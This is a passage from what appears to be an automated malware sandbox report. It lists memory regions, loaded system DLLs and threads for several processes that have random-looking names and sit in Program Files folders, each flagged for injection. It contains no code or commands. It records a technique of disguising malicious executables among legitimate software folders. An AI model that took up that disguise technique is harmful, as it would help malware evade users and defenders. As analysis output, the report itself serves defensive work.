"c:\\windows\\syswow64\\imm32.dll") Region: id = 3122 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3123 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3124 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3125 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3126 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3127 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3128 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3129 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3130 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 165 os_tid = 0x1030 Thread: id = 166 os_tid = 0x1018 Process: id = "22" image_name = "whosouth.exe" filename = "c:\\program files\\internet explorer\\whosouth.exe" page_root = "0x1f08b000" os_pid = "0x1038" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Internet Explorer\\whosouth.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3179 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3180 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3181 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3182 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3183 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3184 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3185 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3186 start_va = 0xc0000 end_va = 0xd6fff monitored = 0 entry_point = 0xc14a1 region_type = mapped_file name = "whosouth.exe" filename = "\\Program Files\\Internet Explorer\\whosouth.exe" (normalized: "c:\\program files\\internet explorer\\whosouth.exe") Region: id = 3187 start_va = 0xe0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3188 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3189 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3190 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3191 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3192 start_va = 0x4c0000 end_va = 0x4c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 3193 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3194 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3195 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 3196 start_va = 0x920000 end_va = 0xaa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 3197 start_va = 0xab0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 3198 start_va = 0x1f40000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 3199 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 3200 start_va = 0x1f70000 end_va = 0x202bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f70000" filename = "" Region: id = 3201 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3202 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3203 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3204 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3205 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3206 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3207 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3208 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3209 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3210 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3211 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3212 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3213 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3214 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3215 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3216 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3217 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3218 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3219 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3220 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3221 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3223 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3224 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3225 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3226 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 167 os_tid = 0x1048 Thread: id = 168 os_tid = 0x103c Process: id = "23" image_name = "factor-western-forget.exe" filename = "c:\\program files (x86)\\microsoft.net\\factor-western-forget.exe" page_root = "0x3f89f000" os_pid = "0x1050" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\factor-western-forget.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3275 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3276 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3277 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3278 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3279 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3280 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3281 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3282 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3283 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3284 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3285 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 3286 start_va = 0x2a0000 end_va = 0x2a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 3287 start_va = 0x2b0000 end_va = 0x2c6fff monitored = 0 entry_point = 0x2b14a1 region_type = mapped_file name = "factor-western-forget.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\factor-western-forget.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\factor-western-forget.exe") Region: id = 3288 start_va = 0x310000 end_va = 0x3cbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 3289 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3290 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 3291 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 3292 start_va = 0x9b0000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 3293 start_va = 0xab0000 end_va = 0xc30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 3294 start_va = 0xc40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c40000" filename = "" Region: id = 3295 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 3296 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 3297 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3298 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3299 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3300 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3301 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3302 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3303 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3304 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3305 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3306 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3307 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3308 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3309 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3310 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3311 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3312 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3313 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3314 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3315 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3316 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3317 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3318 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3319 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3320 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3321 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3322 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 169 os_tid = 0x1058 Thread: id = 170 os_tid = 0x1054 Process: id = "24" image_name = "throwtowardpurpose.exe" filename = "c:\\program files\\microsoft office 15\\throwtowardpurpose.exe" page_root = "0x3e8b4000" os_pid = "0x105c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Microsoft Office 15\\throwtowardpurpose.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office 15\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3323 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3324 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3325 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3326 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3327 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3328 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3329 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3330 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3331 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3332 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3333 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3334 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3335 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3336 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3337 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3338 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3339 start_va = 0x710000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3340 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 3341 start_va = 0xa30000 end_va = 0xaebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3342 start_va = 0xb00000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 3343 start_va = 0x1350000 end_va = 0x1366fff monitored = 0 entry_point = 0x13514a1 region_type = mapped_file name = "throwtowardpurpose.exe" filename = "\\Program Files\\Microsoft Office 15\\throwtowardpurpose.exe" (normalized: "c:\\program files\\microsoft office 15\\throwtowardpurpose.exe") Region: id = 3344 start_va = 0x1370000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3345 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3346 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3347 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3348 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3349 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3350 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3351 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = 